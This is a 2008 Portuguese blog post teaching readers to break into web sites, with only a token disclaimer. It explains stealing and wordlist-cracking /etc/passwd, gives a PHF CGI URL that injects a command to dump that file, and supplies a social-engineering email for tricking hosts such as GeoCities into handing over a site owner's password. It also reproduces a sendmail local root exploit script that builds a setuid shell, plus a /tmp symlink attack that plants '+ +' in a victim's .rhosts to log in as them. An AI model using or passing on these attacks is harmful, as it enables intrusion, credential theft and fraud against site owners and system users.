quinta-feira, 5 de junho de 2008

Invasão de Sities ( Não Me Responsabiliso Por Nada )















Invadindo Hp's

Precauções que vc deverá
tomar quando hackear uma HP


Em primeiro lugar eu gostaria de avisar que hackear uma Home Page é crime, e dá cadeia.Se vc não hackear uma HP corretamente, seu IP ficará gravado em algum lugar e isso fará com que eles saibam

quem foi.Antes de fazer isso vc deverá estar preparado assim usando programas para
hackear.


A senha esta em um arquivo chamado password.
Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix).

Uma senha encryptada é mais ou menos assim :

root:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom

Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy

Bob:/usr/people/bbob:/bin/csh


Agora o exemplo de uma senha com shadow


root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/

usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW

Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper

Admin:/export/home/webmastr/new/gregY/test/

pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false


Você pode notar que tem um "x" no root! Esse
x pode ser representado também por um "*". Agora você já sabe um pouco mais
sobre o arquivo passwd e sobre as senhas.


Desencriptando


Para desencryptar uma senha precisaremos de
três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack
14)e logicamente o arquivo onde está senha (passwd). O que é cada um? Word list-
Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o
programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está
a senha encryptada.


Coloque todos esses itens nesse mesmo
diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça
o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde
esta a senha" "nome da sua word list" Então vamos supor que meu programa é o
jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack
passwd lista.txt


E pronto! A senha está desencryptada! Mas
como isso funciona??

Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras
da word list.


Invasão por PHF


O phf é com certeza o modo mais simples de
se obter o arquivo passwd. É tão simples que você não precisa saber nada! A
única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém
esse método tem 95% de chance de não funcionar! A maioria dos servidores já
acharam o bug e concertaram. Só colocar essa URL no local do seu browser :
http://Endereçodapage/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd


Apenas isso e pronto!


Hackeando Home Pages de Servidores Grátis


Alguns servidores de home page tipo a
geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home
pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão
nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra
eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo :
"por favor me mandem a senha". Façam algo mais convincente. Pegue todas as
informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço
de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do
cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei
das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é :
"user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."


Companhias como a geocities são muito
ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram
acreditar e em 2 semanas (mais ou menos) você receberá a senha no seu e-mail!


Telnet e Exploits


Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits
expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin....
Vou listar alguns exploits abaixo :

Esse se chama sendmail bug.
Ele cria um programa /tmp/x que chama

shells como root.



cat << _EOF_>/tmp/x.c  



 #define RUN "/bin/ksh"  



 #include



 main()  



 {  



    execl(RUN,RUN,NULL);  



 }  



_EOF_  



#  



cat << _EOF_>/tmp/spawnfish.c  



 main()  



 {  



   execl("/usr/lib/sendmail","/tmp/smtpd",0);  



 }  



_EOF_  



#  



cat << _EOF_>/tmp/smtpd.c  



 main()  



 {  



   setuid(0); setgid(0);  



   system("chown root /tmp/x ;chmod 4755 /tmp/x");  



 }  



_EOF_  



#  



#  



gcc -O  -o /tmp/x /tmp/x.c  



gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c  



gcc -O3 -o /tmp/smtpd /tmp/smtpd.c  



#  



/tmp/spawnfish  



kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed 



s/"[ ]*"// |cut -d" " -f1`  



rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd 



/tmp/x.c  



sleep 5  



if [ -u /tmp/x ] ; then  



   echo "leet..."  



   /tmp/x  



fi  




agora é um outro método.







catluvr (6 19:06) litterbox:~> ps -aux | grep pine  



catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep 



pine  



hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine  







catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors  



- -rw-rw-rw-   1 hamors   elite            4 Aug 26 19:05 



.302.f5a4  







catluvr (8 19:07) litterbox:~> ps -aux | grep pine  



catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep 



pine  







catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts 



/tmp/.302.f5a4  







hamors (23 19:09) litterbox:~> pine  







catluvr (11 19:10) litterbox:~> ps -aux | grep pine  



catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep 



pine  



hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine  







catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4  







catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4  



+ +  







catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4  







catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors




Postado por às

Um comentário:

Anônimo disse...

Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!

14 de novembro de 2009 às 04:47

Postar um comentário

Assinar: Postar comentários (Atom)